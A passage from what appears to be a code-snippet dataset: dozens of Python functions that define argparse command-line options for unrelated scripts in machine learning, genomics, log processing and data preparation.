parser.add_argument('config', help='configuration file')\n parser.add_argument('-d', metavar='DB', help='name of database to connect')\n parser.add_argument('-u', help='update database', action='store_true')\n args = parser.parse_args()\n return args.config, args.d, args.u", "def parse_command_line():\r\n\r\n parser = argparse.ArgumentParser(description='User args')\r\n parser.add_argument(\"--action\", choices=['train', 'predict', 'demo', 'test'], required=True, help=\"Choose action.\")\r\n parser.add_argument(\"--model\", choices=['vgg', 'unet', 'fpn'], required=True, help=\"Choose model.\")\r\n parser.add_argument(\"--dataset\", choices=['full', 'small'], required=True, help=\"Choose dataset.\")\r\n\r\n return parser.parse_args()", "def parse_cmd_arguments():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('-i', '--input', required=True, help='input JSON file')\n parser.add_argument('-o', '--output', required=True,\n help='ouput JSON file')\n parser.add_argument('-d', '--debug', required=False,\n help='log level. Can be 0-3. Defaults to 0')\n\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n # All reference encoders\n parser.add_argument(\"--step\", dest=\"step\", default=\"10\", type=int, help=\"step size\")\n parser.add_argument(\"--repeats\", dest=\"repeats\", type=int, default=1, help=\"repeats\")\n\n parser.add_argument(dest=\"image\", default=None,\n help=\"select the test image to run\")\n\n args = parser.parse_args()\n return args", "def parseArgs():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', default='fsod', help='training dataset') # use fsod dataset for default\n parser.add_argument('--cfg', dest='cfg_file', required=True, help='optional config file')\n parser.add_argument('--load_ckpt', help='path to load checkpoint')\n parser.add_argument('--load_detectron', help='path to load detectron weight pickle file')\n parser.add_argument('--output_dir', help='output directory to save the testing results.')\n parser.add_argument('--range', help='[start, end)', type=int, nargs=2)\n parser.add_argument('--visualize', dest='visualize', help='output images of detection', action='store_true')\n return parser.parse_args()", "def parse_cmdline():\n\tparser = ArgumentParser(prog=\"FastP_QC.py\", description=\"\"\"Script collects stats from fastp jsons.\"\"\")\n\tparser.add_argument(\"-r1\", \"--r1_stats\", dest=\"r1_stats\", action=\"store\", required=True, help=\"Text file with r1 stats, from q30.py script.\")\n\tparser.add_argument(\"-r2\", \"--r2_stats\", dest=\"r2_stats\", action=\"store\", required=True, help=\"Text file with r2 stats, from q30.py script.\")\n\tparser.add_argument(\"-n\", \"--name\", dest=\"name\", action=\"store\", required=True, help=\"Sample name\")\n\targs = parser.parse_args()\n\treturn args", "def parse_args():\n parser = default_argument_parser()\n parser.add_argument(\"--label-map\",\n dest=\"label_map\",\n type=pathlib.Path,\n help=\"Label map in YAML format which maps from category \"\n \"ID to name.\")\n parser.add_argument(\"--train-csv\",\n dest=\"train_csv\",\n required=True,\n type=pathlib.Path,\n help=\"Path to training data CSV file.\")\n parser.add_argument(\"--valid-csv\",\n dest=\"valid_csv\",\n required=False,\n type=pathlib.Path,\n help=\"Optional path to validation data CSV file.\")\n parser.add_argument(\n \"--image-width\",\n type=int,\n help=\"Image width (optional, used to speed up dataset processing).\")\n parser.add_argument(\n \"--image-height\",\n type=int,\n help=\"Image height (optional, used to speed up dataset processing).\")\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n help_str = \\\n 'The collection folder to sort files into. ' \\\n 'If the folder does not exist, it will be created along with the ' \\\n 'necessary contents.'\n parser.add_argument('-c', '--collection', help=help_str)\n\n help_str = \\\n 'The source folder to import files from. Has to exist and ' \\\n 'has to be a folder.'\n parser.add_argument('-s', '--source', help=help_str, required=False)\n\n help_str = \\\n 'View the gallery in random order auto skpping after the' \\\n 'given amount of seconds'\n parser.add_argument('-v', '--view', help=help_str, required=False)\n\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(prog='AdapterRunner', description='Adapter Runner Application')\n parser.add_argument('-a', '--application', action='store', dest='app_name', help='Application Name',\n metavar='<application_name>')\n parser.add_argument('-fi', '--fetch_interval', action='store', dest='fetch_stats_interval', help='Fetch Stats Interval',\n metavar='<fetch_interval in seconds>')\n return parser.parse_args()", "def parse_args():\n\tparser = argparse.ArgumentParser(description='Show video statistics.')\n\tparser.add_argument('--sort', metavar='FIELD', choices=['views', 'likes', 'dislikes'],\n\t default='views',\n\t help='sort by the specified field. Options are views, likes and dislikes.')\n\tparser.add_argument('--max', metavar='MAX', type=int, help='show the top MAX entries only.')\n\tparser.add_argument('--csv', action='store_true', default=False,\n\t help='output the data in CSV format.')\n\tparser.add_argument('--table', action='store_true', default=False,\n\t help='output the data in an ascii table.')\n\tparser.add_argument('--workers', type=int, default=8,\n\t help='number of workers to use, 8 by default.')\n\treturn parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"\"\"A script to get the kmer frequency\n from csv files with kmer counts from genomes.\"\"\")\n\n parser.add_argument('-sd',\n '--sub_dir',\n type=str,\n dest='sub_dir',\n help='Subdirectory name for output files.') # kmer_count\n\n parser.add_argument('-do',\n '--dir_out',\n type=str,\n dest='dir_out',\n help='directory name for output files.') # Results/kmer_freq\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"-threads\", help=\"specifies a thread count for parallel operations\", type=int)\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"CUDAPOA Python API sample program.\")\n parser.add_argument('-m',\n help=\"Run MSA generation. By default consensusis generated.\",\n action='store_true')\n parser.add_argument('-p',\n help=\"Print output MSA or consensus for each POA group.\",\n action='store_true')\n parser.add_argument('-l',\n help=\"Use long or short read sample data.\",\n action='store_true')\n return parser.parse_args()", "def argumentsParser(args):\n\targuments = []\n\tif args.find('\"') > -1:\n\t\tt_arguments = args.split('\"')\n\t\tfor a in t_arguments:\n\t\t\tif a == '' or a == ' ':\n\t\t\t\tpass\n\t\t\telif a[-1] == ' ':\n\t\t\t\targuments.append(a[:-1])\n\t\t\telse:\n\t\t\t\targuments.append(a)\n\telif args.find(\"'\") > -1:\n\t\tt_arguments = args.split(\"'\")\n\t\tfor a in t_arguments:\n\t\t\tif a == '' or a == ' ':\n\t\t\t\tpass\n\t\t\telif a[-1] == ' ':\n\t\t\t\targuments.append(a[:-1])\n\t\t\telse:\n\t\t\t\targuments.append(a)\n\telif args == ' ':\n\t\tpass\n\telse:\n\t\targuments = args.split(' ')\n\treturn arguments", "def parse_arguments():\n # shift away script name\n scriptname=sys.argv[0]\n shift()\n ncl_cmd=list()\n quali_cmd=list()\n id_cmd=list() \n while(len(sys.argv)>0):\n carg = sys.argv[0]\n shift()\n if(carg == \"--nucleotide\"):\n ncl_cmd = mungeArgs(sys.argv)\n elif(carg == \"--quality\"):\n quali_cmd = mungeArgs(sys.argv)\n elif(carg == \"--id\" ):\n id_cmd = mungeArgs(sys.argv)\n elif(carg in [\"-h\", \"--help\"]):\n usage()\n else:\n usage(error=True)\n # Excess arguments which are not processed \n if(len(sys.argv) > 0):\n sys.stdout.write(\"Excess arguments!\\n\")\n sys.stdout.flush()\n usage(error=True)\n\n # external modules rely on non-empty argv array, \n # re-append the script name as first command line argument\n sys.argv.append(scriptname)\n return (id_cmd, ncl_cmd, quali_cmd)", "def parse_arguments():\n parser = ArgumentParser()\n\n # For development/testing\n parser.add_argument(\"--dev\", help=\"run the code of the developers tag\")\n\n return parser.parse_args()", "def parse_args(args=None):\n return AP.parse_args(args=args)", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--version',\n metavar=\"<str>\",\n help=\"Input data version number\",\n type=str,\n required=True\n )\n args = parser.parse_args()\n return args", "def process_command_line_arguments() -> Namespace:\n\n parser = build_parser()\n arguments = parser.parse_args()\n\n return arguments", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--obs_len\",\n default=20,\n type=int,\n help=\"Directory where the sequences (csv files) are saved\",\n )\n parser.add_argument(\n \"--data_dir\",\n default=\"\",\n type=str,\n help=\"Directory where the sequences (csv files) are saved\",\n )\n parser.add_argument(\n \"--feature_dir\",\n default=\"\",\n type=str,\n help=\"Directory where the computed features are saved\",\n )\n parser.add_argument(\"--mode\",\n required=True,\n type=str,\n help=\"train/val/test/compute_all/lanes_only\")\n parser.add_argument(\n \"--sequence_num\",\n default=-1,\n type=int,\n help=\"Specify a specific sequence to visualize.\",\n )\n parser.add_argument(\n \"--batch_start\",\n default=0,\n type=int,\n help=\"Specify the starting row of features to visualize.\",\n )\n parser.add_argument(\n \"--batch_end\",\n default=-1,\n type=int,\n help=\"Specify the last row to visualize, -1 to visualize till end.\",\n )\n parser.add_argument(\n \"--single_figure\",\n default=False,\n action=\"store_true\",\n help=\"Plot all candidates for a scenein one figure.\",\n )\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('n_iter',\n help='number of iteration',\n type=int)\n parser.add_argument('n_processes',\n help='number of processes',\n type=int)\n parser.add_argument('method',\n help='mutual exclusion method')\n parser.add_argument('duration',\n help='Duration of each process',\n type=float)\n return parser.parse_args()", "def parse_arguments(args=sys.argv[1:]):\n \n parser = argparse.ArgumentParser()\n \n parser.add_argument('-i', '--input',\n help=\"Path of input file to read. Default: {d}\".format(d=INPUT_FILE),\n default=INPUT_FILE)\n \n return parser.parse_args(args)", "def parse_arguments():\n\n parser = argparse.ArgumentParser(\n description=\"生成用户字符串识别的切分字符串\"\n )\n parser.add_argument(\n \"-o\",\n \"--output_dir\",\n type=str,\n nargs=\"?\",\n help=\"The output directory\",\n default=\"output/\"\n )\n parser.add_argument(\n \"-i\",\n \"--input_file\",\n type=str,\n nargs=\"?\",\n help=\"When set, this argument uses a specified text file as source for the text\",\n default=\"\",\n required=True\n )\n parser.add_argument(\n \"-mi\",\n \"--min_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The minimum number of characters per line, Default is 3.\",\n default=3,\n\n )\n parser.add_argument(\n \"-ma\",\n \"--max_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The maximum number of characters per line, Default is 20.\",\n default=20,\n )\n return parser.parse_args()", "def parse_command_line_arguments():\n parser = argparse.ArgumentParser()\n\n # Positional args\n parser.add_argument('data_directory', action=\"store\")\n\n # Optional args\n parser.add_argument('--save_dir', action='store',\n dest='save_dir',\n help='Load categories names from given file',\n default=\"checkpoint.pth\")\n\n parser.add_argument('--gpu', action='store_true',\n dest='device',\n help='Device of prediction processing',\n default=False)\n\n parser.add_argument('--arch', action='store',\n dest='arch',\n help='Name of pre-trained network used for training',\n default=\"vgg11\")\n\n parser.add_argument('--learning_rate', action='store',\n dest='learning_rate',\n help='value of training learning rate',\n default=0.001)\n\n parser.add_argument('--hidden_units', action='store',\n dest='hidden_units',\n help='Number of units in the fully-connected hidden '\n 'layer of the neural netwrork',\n default=512)\n\n parser.add_argument('--epochs', action='store',\n dest='epochs',\n help='Number of training epochs',\n default=5)\n\n # Parse all args\n results = parser.parse_args()\n\n return results", "def parseArguments():\n # Create argument parser\n parser = argparse.ArgumentParser()\n\n # Optional arguments\n parser.add_argument(\"-t\", \"--test\", help=\"Optionally test algorithm on subsample of the data. Set to 1 for testing\", type=int, default=0)\n\n parser.add_argument(\"--cores\", help=\"Optimized code for a server with a lot of RAM, set to the number of available cores\", type=int, default=40)\n\n\n # Print version\n parser.add_argument(\"--version\", action=\"version\", version='%(prog)s - Version 2.0') #version 1.0 is for the observations in June 2018\n #version 1.1 contains the optimizations made after the june observations (mainly the switch to stackmags)\n #version 1.2 changed sim class to NOT include the list of failed candidates (not qsos)\n #... copied changes made to crossval version\n #version 1.5 added check for duplicate quasars and remove them\n #version 1.6 new simulated quasars (december)\n ##-------------------\n #version 2.0: combined training of classifier and regressor, streamlined input\n #version 2.1: Tryied to updates excluded area to a little more than stripe 82 but decided not to keep it, so no change\n\n # Parse arguments\n args = parser.parse_args()\n\n return args", "def arg_parse():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-f\",\n \"--fpath\",\n type=str,\n required=True,\n help=\"Path to files to generate test data from e.g. /badc/cmip5/data/cmip5/output1/MOHC/HadGEM2-ES/rcp85/mon/atmos/Amon/r1i1p1/latest/tas\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--time_only\",\n default=False,\n help=\"Only generate one time step of this dataset\",\n action=\"store_true\",\n )\n\n parser.add_argument(\n \"-s\",\n \"--step\",\n type=int,\n default=100,\n help=\"Step to select latitude/longitude by. Only relevant when time_only is False\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--number\",\n type=int,\n default=0,\n help=\"Number of files to generate. Default is all files. Only relevant when time_only is False\",\n )\n\n parser.add_argument(\n \"-l\",\n \"--level\",\n type=int,\n default=-1,\n help=\"Number of levels to extract, starting with index 0.\",\n )\n\n parser.add_argument(\n \"-c\", \"--compress\", help=\"Compress the files.\", action=\"store_true\"\n )\n\n return parser.parse_args()", "def parse_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input_path\", required=True)\n parser.add_argument(\"-c\", \"--config\", required=True)\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-e\", \"--events\", type=str,\n help=\"path to events CSV-file\")\n parser.add_argument(\"-d\", \"--data\", type=str,\n help=\"path to data CSV-file\")\n parser.add_argument(\"-l\", \"--limit\", nargs='?', type=int, default=None,\n help=\"max records to be processed\")\n parser.add_argument(\"-t\", \"--timezone\", nargs='?', type=int, default=5,\n help=\"date and time shift\")\n parser.add_argument(\"-o\", \"--optimized\", action='store_true',\n help=\"if specified, then data CSV will be processed\"\n \" by small chunks to escape memory issues\")\n parser.add_argument(\"-v\", \"--verbose\", action='store_true')\n parser.add_argument(\"--output-folder\", nargs='?', type=str,\n default=\"linked\")\n return vars(parser.parse_args())", "def Args(parser):", "def parse_args():\n parser = ArgumentParser()\n parser.add_argument('-t', '--timer', action='store_true', \\\n help='Time the first random generation')\n parser.add_argument('-i', '--ibmq', default='', help='IBMQ token')\n parser.add_argument('-b', '--backend', default='', help='IBMQ backend')\n return parser.parse_args()", "def parse_arguments():\n p = argparse.ArgumentParser(description='Prepare the dataset for use by neural models.')\n p.add_argument(\"json_file\", type=argparse.FileType('r'), help=\"json file with all the data\")\n p.add_argument(\"prefix\", type=str, help=\"prefix for all the generated files\")\n p.add_argument(\"data_type\", type=str, choices=[\"names\", \"comments\", \"nc\"],\n default=\"nc\", help=\"type of the information recorded in the dataset\")\n p.add_argument(\"labels\", type=str, choices=[\"PROG\", \"ALL\", \"TOP\"],\n default=\"PROG\", help=\"method by which to choose the labels for the dataset\")\n p.add_argument(\"-other_label\", type=str, required=False, default=\"\",\n help=\"label to use instead of all infrequent labels. \"\n \"This can be left blank to ignore infrequent labels altogether\")\n p.add_argument(\"-label_num\", type=int, default=100, required=False,\n help=\"Number of most frequent labels to keep. Works with label_choice=TOP\")\n p.add_argument(\"-min_prog_labels\", type=int, default=5, required=False,\n help=\"Minimal number of programs a label has to appear in for it to be included \"\n \"in the dataset. Works with label_choice=PROG\")\n p.add_argument(\"-test_prog_list\", type=argparse.FileType('r'), default=None, required=False,\n help=\"file with the list of programs in the test set (optional)\")\n\n return p.parse_args(sys.argv[1:])", "def parse_args():\n\n parser = argparse.ArgumentParser(description='Disk metric sender')\n parser.add_argument('-v', '--verbose', action='store_true', default=None, help='Verbose?')\n parser.add_argument('--debug', action='store_true', default=None, help='Debug?')\n\n return parser.parse_args()", "def parse_args():\n from argparse import ArgumentParser\n ap = ArgumentParser(prog=__exe__, description=__purpose__)\n ap.add_argument('session', help='Session Label')\n ap.add_argument('-sd', '--subjects_dir', help='Subjects Dir',\n default='/tmp')\n return ap.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Parse library type information.\")\n parser.add_argument(\"input_file\", help=\"Salmon library type information file.\")\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description='Google reminders cli',\n epilog=usage,\n formatter_class=argparse.RawTextHelpFormatter)\n return parser.parse_args()", "def _parse_args(argv):\n parser = make_parser()\n args = parser.parse_args(argv)\n LOGGER.setLevel(to_log_level(args.loglevel))\n\n if not args.inputs:\n if args.list:\n tlist = \", \".join(API.list_types())\n _exit_with_output(\"Supported config types: \" + tlist)\n elif args.env:\n cnf = os.environ.copy()\n _output_result(cnf, args.output, args.otype or \"json\", None, None)\n sys.exit(0)\n else:\n parser.print_usage()\n sys.exit(1)\n\n if args.validate and args.schema is None:\n _exit_with_output(\"--validate option requires --scheme option\", 1)\n\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser(\n description=\"script for downloading and merging log files from S3 for particular time period\")\n parser.add_argument(\"-s\", \n \"--startdate\", \n help=\"start date in format YYYYMMDD\", \n required=True, \n type=valid_date)\n parser.add_argument(\"-e\", \"--enddate\", \n help=\"end date in format YYYYMMDD\", \n required=True, \n type=valid_date)\n parser.add_argument(\"-f\", \n \"--file\", \n help=\"destination file\", \n required=True)\n parser.add_argument( \"-c\", \"--config\",\n default=\"/Users/samarius/.get_analytics_log.config.json\",\n help=\"configuration file path\")\n\n\n try:\n args = parser.parse_args()\n return args\n except Exception as e:\n print \"can't parse command line args: {}\".format(repr(e))\n raise", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--file\", help=\"file with the cohort you want to check / fix\", type=str, required=True)\n parser.add_argument(\"-o\", \"--outdir\", help=\"where should the files and the result readme be stored?\", type=str, required=True)\n return parser.parse_args()", "def arg_parse():\n p = ap.ArgumentParser()\n p.add_argument('infile',\n help='path to file containing objects')\n p.add_argument('n1',\n help='night 1')\n p.add_argument('n2',\n help='night 2')\n p.add_argument('observatory',\n help='Astropy name of observatory')\n return p.parse_args()", "def parse_args():\n parser = OptionParser()\n parser.add_option('--data-file', '-f', default='train_data.hdf5',\n help=\"The path to the data file\")\n parser.add_option('--runs-per-epoch', '-r', type='int',\n help=\"The number of runs per epoch (train samples count)\")\n parser.add_option('--avg-window-size', '-w', default='1', type='int',\n help=\"The window size for moving average\")\n\n (options, args) = parser.parse_args()\n return options", "def parse_arguments():\n #usage = \"usage: %(prog)s [options] <message file>\" + DESCRIPTION\n parser = ArgumentParser()\n parser.add_argument('-v', '--version', action='version', version=VERSION)\n parser.add_argument('source', metavar='source', help='input logfile or directory with logfiles')\n\n \"\"\"\n parser.add_argument('-m', '--mat-id', metavar='string', # or stare_false\n dest=\"id_mat\", default='', # negative store value\n help=\"material id to grep\")\n parser.add_argument('-c', '--count', metavar='N', type=int, # or stare_false\n dest=\"count\", default=0, # negative store value\n help=\"count\")\n parser.add_argument('-p', '--pattern', metavar='string', # or stare_false\n dest=\"pattern\", default='xxx', # negative store value\n help=\"search pattern within logfile\")\n \"\"\"\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(\n description=\"Subscription Watch CSV file packaging script\", prog=sys.argv[0])\n\n # required args\n parser.add_argument(\"-f\", \"--filepath\", required=True,\n help=\"path to files to package\")\n parser.add_argument(\n \"-s\",\n \"--max-size\",\n type=int,\n default=DEFAULT_MAX_SIZE,\n help=f\"Maximum size of packages in MiB. (Default: {DEFAULT_MAX_SIZE} MiB)\",\n )\n parser.add_argument(\n \"-o\", \"--overwrite\", action=\"store_true\", default=False, help=\"whether to overwrite existing files.\"\n )\n parser.add_argument(\"--ocp-cluster-id\", required=True,\n help=\"OCP Cluster ID\")\n parser.add_argument(\"-v\", \"--verbosity\", action=\"count\",\n default=0, help=\"increase verbosity (up to -vvv)\")\n return parser.parse_args()", "def parseArguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_folder',\n help='Path of the folder where output files should be written.')\n parser.add_argument('--partition_id',\n help='ID of the computer partition to collect data from.')\n parser.add_argument('--collector_db',\n help='The path of slapos collect database.')\n\n return parser.parse_args()", "def parse_command_line() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'pet_database',\n type=str,\n help='path to pet database'\n )\n parser.add_argument(\n '--image_dir',\n default='data/images'\n )\n parser.add_argument(\n '--log',\n default=None,\n help='log file path'\n )\n\n args = parser.parse_args()\n args.pet_database = os.path.abspath(os.path.expanduser(args.pet_database))\n args.image_dir = os.path.abspath(os.path.expanduser(args.image_dir))\n args.log = os.path.abspath(os.path.expanduser(args.log)) if args.log else None\n return args", "def parse_args():\n parser = argparse.ArgumentParser('Reading Comprehension on BaiduRC dataset')\n parser.add_argument('--prepare', action='store_true',\n help='create the directories, prepare the vocabulary and embeddings')\n parser.add_argument('--train', action='store_true',\n help='train the model')\n parser.add_argument('--generate', action='store_true',\n help='predict the answers for test set with trained model')\n parser.add_argument('--gentest', action='store_true',\n help='predict the answers for test set with trained model')\n parser.add_argument('--gpu', type=str, default='0',\n help='specify gpu device')\n\n train_settings = parser.add_argument_group('train settings')\n train_settings.add_argument('--optim', default='Adam',\n help='optimizer type')\n train_settings.add_argument('--learning_rate', type=float, default=0.001,\n help='learning rate')\n train_settings.add_argument('--weight_decay', type=float, default=0,\n help='weight decay')\n train_settings.add_argument('--dropout', type=float, default=0,\n help='dropout keep rate')\n train_settings.add_argument('--batch_size', type=int, default=128,\n help='train batch size')\n train_settings.add_argument('--epochs', type=int, default=10,\n help='train epochs')\n\n model_settings = parser.add_argument_group('model settings')\n model_settings.add_argument('--embed_size', type=int, default=128,\n help='size of the embeddings')\n model_settings.add_argument('--hidden_size', type=int, default=256,\n help='size of LSTM hidden units')\n model_settings.add_argument('--max_seq_len', type=int, default=50,\n help='max passage num in one sample')\n model_settings.add_argument('--max_gen_len', type=int, default=50,\n help='max length of passage')\n\n path_settings = parser.add_argument_group('path settings')\n path_settings.add_argument('--vocab_dir', default='../data/vocab/',\n help='the dir to save vocabulary')\n path_settings.add_argument('--model_dir', default='../data/models/',\n help='the dir to store models')\n path_settings.add_argument('--result_dir', default='../data/results/',\n help='the dir to output the results')\n path_settings.add_argument('--summary_dir', default='../data/summary/',\n help='the dir to write tensorboard summary')\n path_settings.add_argument('--log_path',\n help='path of the log file. If not set, logs are printed to console')\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Parse Diff Exp output files\")\n parser.add_argument(\"raw_file\", help=\"DE analysis output file (.tab).\")\n parser.add_argument(\"output_json\", help=\"Output JSON\")\n parser.add_argument(\"output_file\", help=\"Output file\")\n parser.add_argument(\"--gene_id\", help=\"Gene_IDs column name\", type=str)\n parser.add_argument(\"--fdr\", help=\"FDR column name\", type=str)\n parser.add_argument(\"--pvalue\", help=\"Pvalue column name\", type=str)\n parser.add_argument(\"--fwer\", help=\"FWER column name\", type=str)\n parser.add_argument(\"--logodds\", help=\"Log Odds column name\", type=str)\n parser.add_argument(\"--logfc\", help=\"logfc column name\", type=str)\n parser.add_argument(\"--stat\", help=\"Statistics column name\", type=str)\n return parser.parse_args()", "def parse_args():\n\n parser = argparse.ArgumentParser(description='CLI to store Actisense-NGT Gateway values to InfluxDB and publish via MQTT')\n parser.add_argument('--config', '-c', type=str, required=True, help='JSON configuraton file with path')\n return parser.parse_args()", "def parse_args():\n parser = common_parser()\n parser.description = (\n \"Given a sequence dict, fasta index or a bed file, scatter over the \"\n \"defined contigs/regions. Each contig/region will be split into \"\n \"multiple overlapping regions, which will be written to a new bed \"\n \"file. Each contig will be placed in a new file, unless the length of \"\n \"the contigs/regions doesn't exceed a given number.\")\n\n parser.add_argument(\"-c\", \"--chunk-size\", type=int, default=1e6,\n metavar=\"SIZE\",\n help=\"The size of the chunks. The first chunk in a \"\n \"region or contig will be exactly length SIZE, \"\n \"subsequent chunks will SIZE + OVERLAP and the final \"\n \"chunk may be anywhere from 0.5 to 1.5 times SIZE \"\n \"plus overlap. If a region (or contig) is smaller \"\n \"than SIZE the original regions will be returned. \"\n \"Defaults to 1e6\")\n parser.add_argument(\"-m\", \"--minimum-bp-per-file\", type=int, default=45e6,\n help=\"The minimum number of bases represented within \"\n \"a single output bed file. If an input contig or \"\n \"region is smaller than this MINIMUM_BP_PER_FILE, \"\n \"then the next contigs/regions will be placed in the \"\n \"same file untill this minimum is met. Defaults to \"\n \"45e6.\")\n parser.add_argument(\"-o\", \"--overlap\", type=int, default=150,\n help=\"The number of bases which each chunk should \"\n \"overlap with the preceding one. Defaults to 150.\")\n parser.add_argument(\"-S\", \"--split-contigs\", action=\"store_true\",\n help=\"If set, contigs are allowed to be split up over \"\n \"multiple files.\")\n args = parser.parse_args()\n return args", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-d\",\n \"--debug\",\n help=\"Print lots of debugging statements\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.DEBUG,\n default=logging.ERROR,\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"Be verbose\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.INFO,\n )\n parser.add_argument(\"runscript\", default=None)\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", dest=\"input_file\", help=\"input file or pattern\", default=\"\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output_file\", help=\"output file or pattern\", default=\"\")\n parser.add_argument(\"-d\", \"--debug\", dest=\"debug\", action='store_true')\n parser.add_argument(\"-v\", \"--verbose\", dest=\"verbose\", action='store_true')\n parser.set_defaults(verbose=False)\n parser.set_defaults(debug=False)\n return parser.parse_args()", "def parse_args():\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'config',\n help='Config file')\n parser.add_argument(\n '--quiet',\n '-q',\n action='store_true',\n help='do not print to console'\n )\n parser.add_argument(\n '--password',\n '-p',\n action='store_true',\n help='Set password in keyring.'\n )\n parser.add_argument(\n '--update',\n '-u',\n action='store_true',\n help='Only add transactions after last date in database.'\n )\n parser.add_argument(\n '--mark_seen',\n '-m',\n action='store_true',\n help='Mark fetched emails as seen.'\n )\n\n return parser.parse_args()", "def _parse_args():\n args = sys.argv[1:]\n cmd_parser = argparse.ArgumentParser()\n cmd_parser.add_argument(\n '--produce-sub',\n dest='produce_sub',\n help='Produce submision file',\n default=False,\n action='store_true',\n )\n cmd_parser.add_argument(\n '--search-cv',\n dest='search_cv',\n help='Perform Search of parameters',\n default=False,\n action='store_true',\n )\n cmd_opts = cmd_parser.parse_args(args=args)\n return cmd_opts", "def parseInputArgs():\n parser = argparse.ArgumentParser(description=\"Unix cut analog\", usage='%(prog)s [arguments]')\n\n # pos arg\n parser.add_argument('filename', type=str, help='input file name')\n\n # req arg\n requiredNamed = parser.add_argument_group('required arguments')\n requiredNamed.add_argument('-f', '--fields', type=str, help='list of fields, separated by comma', required=True)\n # optional args\n parser.add_argument('-s', '--separator', type=str, default='\\t', help='column separator, default tab')\n\n args = parser.parse_args()\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Note: Plot depth files.\")\n parser.add_argument(\"-d\", \"--depth_dir\", help='depth file directory')\n parser.add_argument(\"-r\", \"--result_dir\", help='output directory')\n parser.add_argument(\"-f\", \"--ref\", help='one depth file as ref')\n parser.add_argument(\"-w\", \"--window_size\", help='sliding window size')\n\n args = parser.parse_args()\n return args", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--zarr_dir',\n type=str,\n help='path to directory of zarr files',\n )\n parser.add_argument(\n '--tiff_dir',\n type=str,\n help='path to directory of tiff files',\n )\n parser.add_argument(\n '--output_dir',\n type=str,\n help='path to directory for writing',\n )\n parser.add_argument(\n '--config_path',\n type=str,\n default=None,\n help='path to yaml preprocess config file',\n )\n \n args = parser.parse_args()\n return args", "def parseArgs(arguments=None):\n\tparser = generateParser(None)\n\treturn parser.parse_known_args(arguments)", "def parse_args():\n parser = ArgumentParser(\n description=__doc__, formatter_class=ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n '-i', '--infile', type=is_valid_file, action=FullPaths,\n metavar='FILE', required=True, help='''Settings file'''\n )\n parser.add_argument(\n '-d', '--ddc_file', type=is_valid_file, action=FullPaths,\n metavar='FILE', default='ddc2_nios2_sw.elf',\n help='''DDC2 download file'''\n )\n parser.add_argument(\n '-t', '--time', type=int, metavar='INT', default=5,\n help='''Number of seconds to run DDC2'''\n )\n parser.add_argument(\n '-o', '--outfile', type=str, default='./data/test/test',\n metavar='FILE', required=False,\n help='''Output location of data (no need to include file extension)'''\n )\n parser.add_argument(\n '--live', action='store_true', default=False,\n help='''Live visualisation'''\n )\n parser.add_argument(\n '-v', '--verbose', action='store_true', default=False,\n help='''Verbose'''\n )\n args = parser.parse_args()\n return args", "def parse_cmdline(argv):\n if argv is None:\n argv = sys.argv[1:]\n\n # initialize the parser object:\n parser = argparse.ArgumentParser(description='Calculates A and Ea from Gaussian output files using GoodVibes. '\n 'List files to be analyzed, reactant(s) first and ending with the '\n 'transition structure. These can be listed on the command line or in '\n 'a file (each line listing a set of reactant(s) and transition '\n 'structure).')\n parser.add_argument(\"-d\", \"--out_dir\", help=\"A directory where output files should be saved. The default location \"\n \"is the current working directory.\", default=None)\n parser.add_argument(\"-f\", dest=\"freq_cutoff\", help=\"Cut-off frequency for both entropy and enthalpy (wavenumbers) \"\n \"(default = 0)\", default=\"0\")\n parser.add_argument(\"-l\", \"--list\", help=\"The location of the list of Gaussian output files. \"\n \"The default file name.\", default=None)\n parser.add_argument(\"-q\", \"--quasiharmonic\", help=\"Use the '-q' option in GoodVibes, which turns on turns on \"\n \"quasi-harmonic corrections to both entropy and enthalpy in the \"\n \"Gibbs free energy (qh-G(T)) output from GoodVibes. \",\n action='store_true')\n parser.add_argument(\"--temp\", help=\"Temperature in K for calculating \\u0394G. The default is the first \"\n \"temperature in 'temp_range' (if specified). If a value is given, the program \"\n \"will use the temperature closest to it in the temp_range.\", default=None)\n parser.add_argument(\"-ti\", \"--temp_range\", help=\"Initial temp, final temp, (and optionally) step size (K) for \"\n \"thermochemistry calculations. The default range is 300,600,30\",\n 